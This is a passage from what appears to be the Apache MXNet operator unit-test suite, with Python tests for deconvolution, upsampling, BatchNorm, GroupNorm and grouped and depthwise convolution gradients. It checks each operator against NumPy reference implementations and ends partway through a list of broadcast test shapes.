assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
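# check_nearest_upsampling_with_shape binds UpSampling(sample_type='nearest') over a
# list of inputs and backpropagates the outputs themselves, so each input's gradient
# must equal its value times the number of output pixels it is replicated into,
# i.e. root_scale**2 * scale**(2*k) for the k-th argument.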
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
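# check_bilinear_upsampling_with_shape initialises the UpSampling weight with the
# standard bilinear kernel w(x, y) = (1 - |x/f - c|) * (1 - |y/f - c|), where
# c = (2f - 1 - f % 2) / (2f) and f is the upsampling factor, and checks that the
# output spatial size equals the input size times root_scale.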
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
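# test_batchnorm checks BatchNorm and contrib.SyncBatchNorm against a hand-written
# reference: y = gamma * (x - mean) / sqrt(var + eps) + beta, running statistics
# updated as r <- momentum * r + (1 - momentum) * batch_stat, and the usual backward
# formulas for dX, dgamma (dW) and dbeta (db) evaluated with mx.nd operations.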
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
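# test_groupnorm compares mx.sym.GroupNorm with a NumPy reference that reshapes
# (N, C, H, W) data to (N, G, C/G, H, W), normalises over the last three axes and
# applies per-group gamma/beta; np_groupnorm_grad implements the matching backward
# pass. Note that np_groupnorm's out.reshape(dshape) relies on dshape being assigned
# further down in this test before the helper is first called.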
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, num_groups, 1, 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out.reshape(dshape), mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, num_groups, 1, 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
gamma_grad = np.sum(x_hat * ograd, axis=(0, 2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype)
x_hat_grad = ograd * gamma
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_groups,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
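# Data generators shared by the binary and broadcast operator tests below: for small
# idx they return hand-picked broadcastable shape pairs, and beyond that they fall
# back to random shapes in which each dimension may independently be collapsed to 1
# on either operand; the *_int variants scale and round the data to integers.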
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
